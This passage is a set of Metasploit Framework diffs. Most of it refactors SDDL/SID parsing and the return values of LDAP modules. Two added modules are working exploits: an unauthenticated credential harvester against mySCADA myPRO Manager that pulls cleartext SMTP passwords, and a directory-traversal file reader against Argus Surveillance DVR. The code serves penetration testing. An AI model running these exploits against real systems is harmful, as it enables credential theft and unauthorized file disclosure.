-          sid = Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_SID_ACCESS_CONTROL_ASSISTANCE_OPS
-        when 'AC'  # SDDL_ALL_APP_PACKAGES
-          sid = Rex::Proto::Secauthz::WellKnownSids::SECURITY_ALL_APP_PACKAGES
-        when 'AN'  # SDDL_ANONYMOUS
-          sid = Rex::Proto::Secauthz::WellKnownSids::SECURITY_ANONYMOUS_LOGON_SID
-        when 'AO'  # SDDL_ACCOUNT_OPERATORS
-          sid = Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_SID_ACCOUNT_OPS
-        when 'AP'  # SDDL_PROTECTED_USERS
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_GROUP_RID_PROTECTED_USERS}"
-        when 'AU'  # SDDL_AUTHENTICATED_USERS
-          sid = Rex::Proto::Secauthz::WellKnownSids::SECURITY_AUTHENTICATED_USER_SID
-        when 'BA'  # SDDL_BUILTIN_ADMINISTRATORS
-          sid = Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_SID_ADMINS
-        when 'BG'  # SDDL_BUILTIN_GUESTS
-          sid = Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_SID_GUESTS
-        when 'BO'  # SDDL_BACKUP_OPERATORS
-          sid = Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_SID_BACKUP_OPS
-        when 'BU'  # SDDL_BUILTIN_USERS
-          sid = Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_SID_USERS
-        when 'CA'  # SDDL_CERT_SERV_ADMINISTRATORS
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_GROUP_RID_CERT_ADMINS}"
-        when 'CD'  # SDDL_CERTSVC_DCOM_ACCESS
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_RID_CERTSVC_DCOM_ACCESS_GROUP}"
-        when 'CG'  # SDDL_CREATOR_GROUP
-          sid = Rex::Proto::Secauthz::WellKnownSids::SECURITY_CREATOR_GROUP_SID
-        when 'CN'  # SDDL_CLONEABLE_CONTROLLERS
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_GROUP_RID_CLONEABLE_CONTROLLERS}"
-        when 'CO'  # SDDL_CREATOR_OWNER
-          sid = Rex::Proto::Secauthz::WellKnownSids::SECURITY_CREATOR_OWNER_SID
-        when 'CY'  # SDDL_CRYPTO_OPERATORS
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_RID_CRYPTO_OPERATORS}"
-        when 'DA'  # SDDL_DOMAIN_ADMINISTRATORS
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_GROUP_RID_ADMINS}"
-        when 'DC'  # SDDL_DOMAIN_COMPUTERS
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_GROUP_RID_COMPUTERS}"
-        when 'DD'  # SDDL_DOMAIN_DOMAIN_CONTROLLERS
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_GROUP_RID_CONTROLLERS}"
-        when 'DG'  # SDDL_DOMAIN_GUESTS
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_GROUP_RID_GUESTS}"
-        when 'DU'  # SDDL_DOMAIN_USERS
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_GROUP_RID_USERS}"
-        when 'EA'  # SDDL_ENTERPRISE_ADMINS
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_GROUP_RID_ENTERPRISE_ADMINS}"
-        when 'ED'  # SDDL_ENTERPRISE_DOMAIN_CONTROLLERS
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::SECURITY_ENTERPRISE_CONTROLLERS_SID}"
-        when 'EK'  # SDDL_ENTERPRISE_KEY_ADMINS
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_GROUP_RID_ENTERPRISE_KEY_ADMINS}"
-        when 'ER'  # SDDL_EVENT_LOG_READERS
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_RID_EVENT_LOG_READERS_GROUP}"
-        when 'ES'  # SDDL_RDS_ENDPOINT_SERVERS
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_RID_RDS_ENDPOINT_SERVERS}"
-        when 'HA'  # SDDL_HYPER_V_ADMINS
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_RID_HYPER_V_ADMINS}"
-        when 'HI'  # SDDL_ML_HIGH
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::SECURITY_MANDATORY_HIGH_RID}"
-        when 'IS'  # SDDL_IIS_USERS
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_RID_IUSERS}"
-        when 'IU'  # SDDL_INTERACTIVE
-          sid = Rex::Proto::Secauthz::WellKnownSids::SECURITY_INTERACTIVE_SID
-        when 'KA'  # SDDL_KEY_ADMINS
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_GROUP_RID_KEY_ADMINS}"
-        when 'LA'  # SDDL_LOCAL_ADMIN
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_USER_RID_ADMIN}"
-        when 'LG'  # SDDL_LOCAL_GUEST
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_USER_RID_GUEST}"
-        when 'LS'  # SDDL_LOCAL_SERVICE
-          sid = Rex::Proto::Secauthz::WellKnownSids::SECURITY_LOCAL_SERVICE_SID
-        when 'LU'  # SDDL_PERFLOG_USERS
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_RID_LOGGING_USERS}"
-        when 'LW'  # SDDL_ML_LOW
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::SECURITY_MANDATORY_LOW_RID}"
-        when 'ME'  # SDDL_ML_MEDIUM
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::SECURITY_MANDATORY_MEDIUM_RID}"
-        when 'MP'  # SDDL_ML_MEDIUM_PLUS
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::SECURITY_MANDATORY_MEDIUM_PLUS_RID}"
-        when 'MU'  # SDDL_PERFMON_USERS
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_RID_MONITORING_USERS}"
-        when 'NO'  # SDDL_NETWORK_CONFIGURATION_OPS
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_RID_NETWORK_CONFIGURATION_OPS}"
-        when 'NS'  # SDDL_NETWORK_SERVICE
-          sid = Rex::Proto::Secauthz::WellKnownSids::SECURITY_NETWORK_SERVICE_SID
-        when 'NU'  # SDDL_NETWORK
-          sid = Rex::Proto::Secauthz::WellKnownSids::SECURITY_NETWORK_SID
-        when 'OW'  # SDDL_OWNER_RIGHTS
-          sid = "#{Rex::Proto::Secauthz::WellKnownSids::SECURITY_CREATOR_SID_AUTHORITY}-4"
-        when 'PA'  # SDDL_GROUP_POLICY_ADMINS
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_GROUP_RID_POLICY_ADMINS}"
-        when 'PO'  # SDDL_PRINTER_OPERATORS
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_RID_PRINT_OPS}"
-        when 'PS'  # SDDL_PERSONAL_SELF
-          sid = Rex::Proto::Secauthz::WellKnownSids::SECURITY_PRINCIPAL_SELF_SID
-        when 'PU'  # SDDL_POWER_USERS
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_RID_POWER_USERS}"
-        when 'RA'  # SDDL_RDS_REMOTE_ACCESS_SERVERS
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_RID_RDS_REMOTE_ACCESS_SERVERS}"
-        when 'RC'  # SDDL_RESTRICTED_CODE
-          sid = Rex::Proto::Secauthz::WellKnownSids::SECURITY_RESTRICTED_CODE_SID
-        when 'RD'  # SDDL_REMOTE_DESKTOP
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_RID_REMOTE_DESKTOP_USERS}"
-        when 'RE'  # SDDL_REPLICATOR
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_RID_REPLICATOR}"
-        when 'RM'  # SDDL_RMS__SERVICE_OPERATORS
-          sid = "#{Rex::Proto::Secauthz::WellKnownSids::SECURITY_BUILTIN_DOMAIN_SID}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_RID_REMOTE_MANAGEMENT_USERS}"
-        when 'RO'  # SDDL_ENTERPRISE_RO_DCs
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_GROUP_RID_ENTERPRISE_READONLY_DOMAIN_CONTROLLERS}"
-        when 'RS'  # SDDL_RAS_SERVERS
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_RID_RAS_SERVERS}"
-        when 'RU'  # SDDL_ALIAS_PREW2KCOMPACC
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_RID_PREW2KCOMPACCESS}"
-        when 'SA'  # SDDL_SCHEMA_ADMINISTRATORS
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_GROUP_RID_SCHEMA_ADMINS}"
-        when 'SI'  # SDDL_ML_SYSTEM
-          sid = Rex::Proto::Secauthz::WellKnownSids::SECURITY_MANDATORY_SYSTEM_SID
-        when 'SO'  # SDDL_SERVER_OPERATORS
-          sid = "#{domain_sid}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_RID_SYSTEM_OPS}"
-        when 'SS'  # SDDL_SERVICE_ASSERTED
-          sid = Rex::Proto::Secauthz::WellKnownSids::SECURITY_AUTHENTICATION_SERVICE_ASSERTED_SID
-        when 'SU'  # SDDL_SERVICE
-          sid = Rex::Proto::Secauthz::WellKnownSids::SECURITY_SERVICE_SID
-        when 'SY'  # SDDL_LOCAL_SYSTEM
-          sid = Rex::Proto::Secauthz::WellKnownSids::SECURITY_LOCAL_SYSTEM_SID
-        when 'UD'  # SDDL_USER_MODE_DRIVERS
-          sid = Rex::Proto::Secauthz::WellKnownSids::SECURITY_USERMODEDRIVERHOST_ID_BASE_SID
-        when 'WD'  # SDDL_EVERYONE
-          sid = "#{Rex::Proto::Secauthz::WellKnownSids::SECURITY_WORLD_SID_AUTHORITY}-#{Rex::Proto::Secauthz::WellKnownSids::SECURITY_WORLD_RID}"
-        when 'WR'  # SDDL_WRITE_RESTRICTED_CODE
-          sid = Rex::Proto::Secauthz::WellKnownSids::SECURITY_WRITE_RESTRICTED_CODE_SID
-        when /^S(-\d+)+/
-        else
-          raise RuntimeError, 'SDDL parse error on invalid SID string: ' + sid
-        end
-
-
-        MsDtypSid.new(sid)
-      end
    end

    def initialize_shared_instance
@@ -683,10 +783,10 @@ module Rex::Proto::MsDtyp

    def initialize_instance
      value = super
-      @owner_sid = get_parameter(:owner_sid)
-      @group_sid = get_parameter(:group_sid)
-      @sacl = get_parameter(:sacl)
-      @dacl = get_parameter(:dacl)
+      self.owner_sid = get_parameter(:owner_sid)
+      self.group_sid = get_parameter(:group_sid)
+      self.sacl = get_parameter(:sacl)
+      self.dacl = get_parameter(:dacl)
      value
    end

@@ -716,16 +816,29 @@ module Rex::Proto::MsDtyp
      snap
    end

-    attr_accessor :owner_sid, :group_sid, :sacl, :dacl
+    def owner_sid=(sid)
+      sid = MsDtypSid.new(sid) unless sid.nil? || sid.is_a?(MsDtypSid)
+      @owner_sid = sid
+    end
+
+    def group_sid=(sid)
+      sid = MsDtypSid.new(sid) unless sid.nil? || sid.is_a?(MsDtypSid)
+      @group_sid = sid
+    end
+
+    attr_accessor :sacl, :dacl
+    attr_reader :owner_sid, :group_sid

    private

+    BUFFER_FIELD_ORDER = %i[ sacl dacl owner_sid group_sid ]
+
    def build_buffer
      buf = ''
-      buf << owner_sid.to_binary_s if owner_sid
-      buf << group_sid.to_binary_s if group_sid
-      buf << sacl.to_binary_s if sacl
-      buf << dacl.to_binary_s if dacl
+      BUFFER_FIELD_ORDER.each do |field_name|
+        field_value = send(field_name)
+        buf << field_value.to_binary_s if field_value
+      end
      buf
    end

@@ -739,7 +852,7 @@ module Rex::Proto::MsDtyp
      return 0 unless instance_variable_get("@#{field}")

      offset = buffer.rel_offset
-      %i[ owner_sid group_sid sacl dacl ].each do |cursor|
+      BUFFER_FIELD_ORDER.each do |cursor|
        break if cursor == field

        cursor = instance_variable_get("@#{cursor}")
@@ -42,7 +42,7 @@ module Rex::Proto::Secauthz
    SECURITY_BUILTIN_DOMAIN_SID = "#{SECURITY_NT_AUTHORITY}-32"
    SECURITY_WRITE_RESTRICTED_CODE_SID = "#{SECURITY_NT_AUTHORITY}-33"

-    SECURITY_USERMODEDRIVERHOST_ID_BASE_SID = "#{SECURITY_NT_AUTHORITY}-0"
+    SECURITY_USERMODEDRIVERHOST_ID_BASE_SID = "S-1-5-84-0-0-0-0-0"
    SECURITY_ALL_APP_PACKAGES = 'S-1-15-2-1'
    SECURITY_MANDATORY_SYSTEM_SID = 'S-1-16-16384'
    SECURITY_AUTHENTICATION_SERVICE_ASSERTED_SID = "S-1-18-2"
@@ -142,7 +142,7 @@ class MetasploitModule < Msf::Auxiliary
  def run
    validate_options

-    send("action_#{action.name.downcase}")
+    result = send("action_#{action.name.downcase}")

    report_service(
      host: rhost,
@@ -151,6 +151,8 @@ class MetasploitModule < Msf::Auxiliary
      name: 'kerberos',
      info: "Module: #{fullname}, KDC for domain #{@realm}"
    )
+
+    result
  rescue ::Rex::ConnectionError => e
    elog('Connection error', error: e)
    fail_with(Failure::Unreachable, e.message)
@@ -276,6 +278,7 @@ class MetasploitModule < Msf::Auxiliary
    print_good("Found NTLM hash for #{@username}: #{ntlm_hash}")

    report_ntlm(ntlm_hash)
+    ntlm_hash
  end

  def report_ntlm(hash)
@@ -116,8 +116,9 @@ class MetasploitModule < Msf::Auxiliary
      end
      @ldap = ldap

-      send("action_#{action.name.downcase}")
+      result = send("action_#{action.name.downcase}")
      print_good('The operation completed successfully!')
+      result
    end
  rescue Errno::ECONNRESET
    fail_with(Failure::Disconnected, 'The connection was reset.')
@@ -147,7 +148,7 @@ class MetasploitModule < Msf::Auxiliary
      "#{datastore['CERT_TEMPLATE']} Certificate Template"
    )
    print_status("Certificate template data written to: #{stored}")
-    obj
+    [obj, stored]
  end

  def get_domain_sid
@@ -323,24 +324,59 @@ class MetasploitModule < Msf::Auxiliary
    print_status("Creating: #{dn}")
    @ldap.add(dn: dn, attributes: attributes)
    validate_query_result!(@ldap.get_operation_result.table)
+    dn
  end

  def action_delete
-    obj = get_certificate_template
+    obj, = get_certificate_template

    @ldap.delete(dn: obj['dn'].first)
    validate_query_result!(@ldap.get_operation_result.table)
+    true
  end

  def action_read
-    obj = get_certificate_template
+    obj, stored = get_certificate_template

    print_status('Certificate Template:')
-    print_status("  distinguishedName: #{obj['distinguishedname'].first}")
-    print_status("  displayName:       #{obj['displayname'].first}") if obj['displayname'].present?
+    print_status("  distinguishedName:    #{obj['distinguishedname'].first}")
+    print_status("  displayName:          #{obj['displayname'].first}") if obj['displayname'].present?
    if obj['objectguid'].first.present?
      object_guid = Rex::Proto::MsDtyp::MsDtypGuid.read(obj['objectguid'].first)
-      print_status("  objectGUID:        #{object_guid}")
+      print_status("  objectGUID:           #{object_guid}")
+    end
+    if obj['ntsecuritydescriptor'].first.present?
+      begin
+        sd = Rex::Proto::MsDtyp::MsDtypSecurityDescriptor.read(obj['ntsecuritydescriptor'].first)
+        sddl_text = sd.to_sddl_text(domain_sid: get_domain_sid)
+      rescue StandardError => e
+        elog('failed to parse a binary security descriptor to SDDL', error: e)
+      else
+        print_status("  nTSecurityDescriptor: #{sddl_text}")
+      end
+    end
+
+    pki_flag = obj['flags']&.first
+    if pki_flag.present?
+      pki_flag = [obj['flags'].first.to_i].pack('l').unpack1('L')
+      print_status("  flags: 0x#{pki_flag.to_s(16).rjust(8, '0')}")
+      %w[
+        CT_FLAG_AUTO_ENROLLMENT
+        CT_FLAG_MACHINE_TYPE
+        CT_FLAG_IS_CA
+        CT_FLAG_ADD_TEMPLATE_NAME
+        CT_FLAG_IS_CROSS_CA
+        CT_FLAG_IS_DEFAULT
+        CT_FLAG_IS_MODIFIED
+        CT_FLAG_DONOTPERSISTINDB
+        CT_FLAG_ADD_EMAIL
+        CT_FLAG_PUBLISH_TO_DS
+        CT_FLAG_EXPORTABLE_KEY
+      ].each do |flag_name|
+        if pki_flag & Rex::Proto::MsCrtd.const_get(flag_name) != 0
+          print_status("     * #{flag_name}")
+        end
+      end
    end

    pki_flag = obj['mspki-certificate-name-flag']&.first
@@ -477,10 +513,16 @@ class MetasploitModule < Msf::Auxiliary
    if obj['pkimaxissuingdepth'].present?
      print_status("  pKIMaxIssuingDepth: #{obj['pkimaxissuingdepth'].first.to_i}")
    end
+
+    if obj['showinadvancedviewonly'].present?
+      print_status("  showInAdvancedViewOnly: #{obj['showinadvancedviewonly'].first}")
+    end
+
+    { object: obj, file: stored }
  end

  def action_update
-    obj = get_certificate_template
+    obj, = get_certificate_template
    new_configuration = load_local_template

    operations = []
@@ -492,6 +534,8 @@ class MetasploitModule < Msf::Auxiliary
        unless value.tally == new_value.tally
          operations << [:replace, attribute, new_value]
        end
+      elsif attribute == 'ntsecuritydescriptor'
+        # the security descriptor can't be deleted so leave it alone unless specified
      else
        operations << [:delete, attribute, nil]
      end
@@ -506,10 +550,11 @@ class MetasploitModule < Msf::Auxiliary

    if operations.empty?
      print_good('There are no changes to be made.')
-      return
+      return true
    end

    @ldap.modify(dn: obj['dn'].first, operations: operations, controls: [ms_security_descriptor_control(DACL_SECURITY_INFORMATION)])
    validate_query_result!(@ldap.get_operation_result.table)
+    true
  end
 end
@@ -167,12 +167,16 @@ class MetasploitModule < Msf::Auxiliary
  def action_read(obj)
    security_descriptor = obj[ATTRIBUTE]
    if security_descriptor.nil?
-      print_status('The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty.')
+      print_status("The #{ATTRIBUTE} field is empty.")
      return
    end

+    if (sddl = sd_to_sddl(security_descriptor))
+      vprint_status("#{ATTRIBUTE}: #{sddl}")
+    end
+
    if security_descriptor.dacl.nil?
-      print_status('The msDS-AllowedToActOnBehalfOfOtherIdentity DACL field is empty.')
+      print_status("The #{ATTRIBUTE} DACL field is empty.")
      return
    end

@@ -211,22 +215,22 @@ class MetasploitModule < Msf::Auxiliary
    security_descriptor.dacl.acl_size.clear

    unless @ldap.replace_attribute(obj['dn'], ATTRIBUTE, security_descriptor.to_binary_s)
-      fail_with_ldap_error('Failed to update the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
+      fail_with_ldap_error("Failed to update the #{ATTRIBUTE} attribute.")
    end
-    print_good('Successfully updated the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
+    print_good("Successfully updated the #{ATTRIBUTE} attribute.")
  end

  def action_flush(obj)
    unless obj[ATTRIBUTE]
-      print_status('The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty. No changes are necessary.')
+      print_status("The #{ATTRIBUTE} field is empty. No changes are necessary.")
      return
    end

    unless @ldap.delete_attribute(obj['dn'], ATTRIBUTE)
-      fail_with_ldap_error('Failed to deleted the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
+      fail_with_ldap_error("Failed to deleted the #{ATTRIBUTE} attribute.")
    end

-    print_good('Successfully deleted the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
+    print_good("Successfully deleted the #{ATTRIBUTE} attribute.")
  end

  def action_write(obj)
@@ -239,26 +243,37 @@ class MetasploitModule < Msf::Auxiliary
  end

  def _action_write_create(obj, delegate_from)
+    vprint_status("Creating new #{ATTRIBUTE}...")
    security_descriptor = Rex::Proto::MsDtyp::MsDtypSecurityDescriptor.new
    security_descriptor.owner_sid = Rex::Proto::MsDtyp::MsDtypSid.new('S-1-5-32-544')
    security_descriptor.dacl = Rex::Proto::MsDtyp::MsDtypAcl.new
    security_descriptor.dacl.acl_revision = Rex::Proto::MsDtyp::MsDtypAcl::ACL_REVISION_DS
    security_descriptor.dacl.aces << build_ace(delegate_from['ObjectSid'])

-    unless @ldap.add_attribute(obj['dn'], ATTRIBUTE, security_descriptor.to_binary_s)
-      fail_with_ldap_error('Failed to create the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
+    if (sddl = sd_to_sddl(security_descriptor))
+      vprint_status("New #{ATTRIBUTE}: #{sddl}")
    end

-    print_good('Successfully created the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
+    unless @ldap.add_attribute(obj['dn'], ATTRIBUTE, security_descriptor.to_binary_s)
+      fail_with_ldap_error("Failed to create the #{ATTRIBUTE} attribute.")
+    end
+
+    print_good("Successfully created the #{ATTRIBUTE} attribute.")
    print_status('Added account:')
    print_status("  #{delegate_from['ObjectSid']} (#{delegate_from['sAMAccountName']})")
  end

  def _action_write_update(obj, delegate_from)
+    vprint_status("Updating existing #{ATTRIBUTE}...")
    security_descriptor = obj[ATTRIBUTE]
+
+    if (sddl = sd_to_sddl(security_descriptor))
+      vprint_status("Old #{ATTRIBUTE}: #{sddl}")
+    end
+
    if security_descriptor.dacl
      if security_descriptor.dacl.aces.any? { |ace| ace.body[:sid].to_s == delegate_from['ObjectSid'].to_s }
-        print_status("Delegation from #{delegate_from['sAMAccountName']} to #{obj['sAMAccountName']} is already enabled.")
+        print_status("Delegation from #{delegate_from['sAMAccountName']} to #{obj['sAMAccountName']} is already configured.")
      end
      # clear these fields so they'll be calculated automatically after the update
      security_descriptor.dacl.acl_count.clear
@@ -271,10 +286,20 @@ class MetasploitModule < Msf::Auxiliary

    security_descriptor.dacl.aces << build_ace(delegate_from['ObjectSid'])

-    unless @ldap.replace_attribute(obj['dn'], ATTRIBUTE, security_descriptor.to_binary_s)
-      fail_with_ldap_error('Failed to update the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
+    if (sddl = sd_to_sddl(security_descriptor))
+      vprint_status("New #{ATTRIBUTE}: #{sddl}")
    end

-    print_good('Successfully updated the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
+    unless @ldap.replace_attribute(obj['dn'], ATTRIBUTE, security_descriptor.to_binary_s)
+      fail_with_ldap_error("Failed to update the #{ATTRIBUTE} attribute.")
+    end
+
+    print_good("Successfully updated the #{ATTRIBUTE} attribute.")
+  end
+
+  def sd_to_sddl(sd)
+    sd.to_sddl_text
+  rescue StandardError => e
+    elog('failed to parse a binary security descriptor to SDDL', error: e)
  end
 end
@@ -0,0 +1,120 @@
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+  CheckCode = Exploit::CheckCode
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'mySCADA myPRO Manager Credential Harvester (CVE-2025-24865 and CVE-2025-22896)',
+        'Description' => %q{
+          Credential Harvester in MyPRO Manager <= v1.3 from mySCADA.
+          The product suffers from a broken authentication vulnerability (CVE-2025-24865) for certain functions. One of them is the configuration page for notifications, which returns the cleartext credentials (CVE-2025-22896) before correctly veryfing that the associated request is coming from an authenticated and authorized entity.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => ['Michael Heinzl'], # Vulnerability discovery & MSF module
+        'References' => [
+          [ 'URL', 'https://www.cisa.gov/news-events/ics-advisories/icsa-25-044-16'],
+          [ 'CVE', '2025-24865'],
+          [ 'CVE', '2025-22896']
+        ],
+        'DisclosureDate' => '2025-02-13',
+        'DefaultOptions' => {
+          'RPORT' => 34022,
+          'SSL' => 'False'
+        },
+        'Platform' => 'win',
+        'Arch' => [ ARCH_CMD ],
+        'Targets' => [
+          [
+            'Windows_Fetch',
+            {
+              'Arch' => [ ARCH_CMD ],
+              'Platform' => 'win',
+              'DefaultOptions' => { 'FETCH_COMMAND' => 'CURL' },
+              'Type' => :win_fetch
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new(
+          'TARGETURI',
+          [ true, 'The URI for the MyPRO Manager web interface', '/' ]
+        )
+      ]
+    )
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'assets/index-DBkpc6FO.js')
+      })
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
+      return CheckCode::Unknown
+    end
+
+    if res.to_s =~ /const S="([^"]+)"/
+      version = ::Regexp.last_match(1)
+      vprint_status('Version retrieved: ' + version)
+      if Rex::Version.new(version) <= Rex::Version.new('1.3')
+        return CheckCode::Appears
+      end
+
+      return CheckCode::Safe
+    end
+    return CheckCode::Unknown
+  end
+
+  def run
+    post_data = {
+      'command' => 'getSettings'
+    }
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'data' => JSON.generate(post_data),
+      'uri' => normalize_uri(target_uri.path, 'get')
+    })
+
+    fail_with(Failure::Unknown, 'No response from server.') if res.nil?
+    fail_with(Failure::UnexpectedReply, 'Non-200 returned from server.') if res.code != 200
+    print_good('Mail server credentials retrieved:')
+    data = res.get_json_document
+
+    if data.key?('smtp') && data['smtp'].is_a?(Hash)
+      smtp_info = data['smtp']
+
+      host = smtp_info.fetch('host', 'Unknown Host')
+      port = smtp_info.fetch('port', 'Unknown Port')
+      auth = smtp_info.fetch('auth', 'Unknown Auth')
+      user = smtp_info.fetch('user', 'Unknown User')
+      passw = smtp_info.fetch('pass', 'Unknown Password')
+
+      print_good("Host: #{host}")
+      print_good("Port: #{port}")
+      print_good("Auth Type: #{auth}")
+      print_good("User: #{user}")
+      print_good("Password: #{passw}")
+
+      unless user == 'Unknown User' || passw == 'Unknown Password'
+        store_valid_credential(user: user, private: passw, proof: data.to_s)
+      end
+    end
+  end
+
+end
@@ -0,0 +1,76 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Argus Surveillance DVR 4.0.0.0 - Directory Traversal',
+        'Description' => %q{
+          This module leverages an unauthenticated arbitrary file read for
+          the Argus Surveillance 4.0.0.0 system which never saw an update since.
+          As this is a Windows related application we recommend looking for common
+          Windows file locations, especially C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini
+          which houses another vulnerability in the Argus Surveillance system. This directory traversal vuln
+          is being tracked as CVE-2018-15745
+        },
+        'Author' => [
+          'Maxwell Francis', # msf module
+          'John Page' # (aka hyp3rlinx) PoC
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
+        },
+        'DefaultOptions' => {
+          'SSL' => false,
+          'RPORT' => 8080
+        },
+        'References' => [
+          # Vendor Download
+          [ 'URL', 'https://argus-surveillance-dvr.soft112.com/#google_vignette'],
+          # Exploit DB Listing
+          [ 'EDB', '45296'],
+          # CVE Number
+          ['CVE', '2018-15745']
+        ]
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGET_FILE', [true, 'The file to retrieve', 'Windows/system.ini'])
+      ]
+    )
+  end
+
+  def run
+    traversal_path = '..%2F' * 16
+    target_file = datastore['TARGET_FILE'].gsub(' ', '%20')
+    url_path = "/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=#{traversal_path}#{target_file}&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
+
+    print_status("Sending request to #{rhost}:#{rport} for file: #{target_file}")
+
+    response = send_request_cgi({
+      'method' => 'GET',
+      'uri' => url_path
+    })
+
+    if response&.code == 200 && !response.body.include?('Cannot find this file.')
+      print_good('File retrieved successfully!')
+      print_line(response.body)
+      store_loot('file_traversal', 'text/plain', rhost, response.body, "#{target_file.gsub('/', '_')}.txt")
+    elsif response
+      print_error('Failed to retrieve file.') # Response from server but file not returned
+    else
+      print_error('No response from target.') # No response from server
+    end
+  end
+end
@@ -3,7 +3,9 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::LDAP
  include Msf::OptionalSession::LDAP
+  include Rex::Proto::MsDnsp
  include Rex::Proto::Secauthz
+  include Rex::Proto::LDAP

  ADS_GROUP_TYPE_BUILTIN_LOCAL_GROUP = 0x00000001
  ADS_GROUP_TYPE_GLOBAL_GROUP = 0x00000002
@@ -15,13 +17,18 @@ class MetasploitModule < Msf::Auxiliary
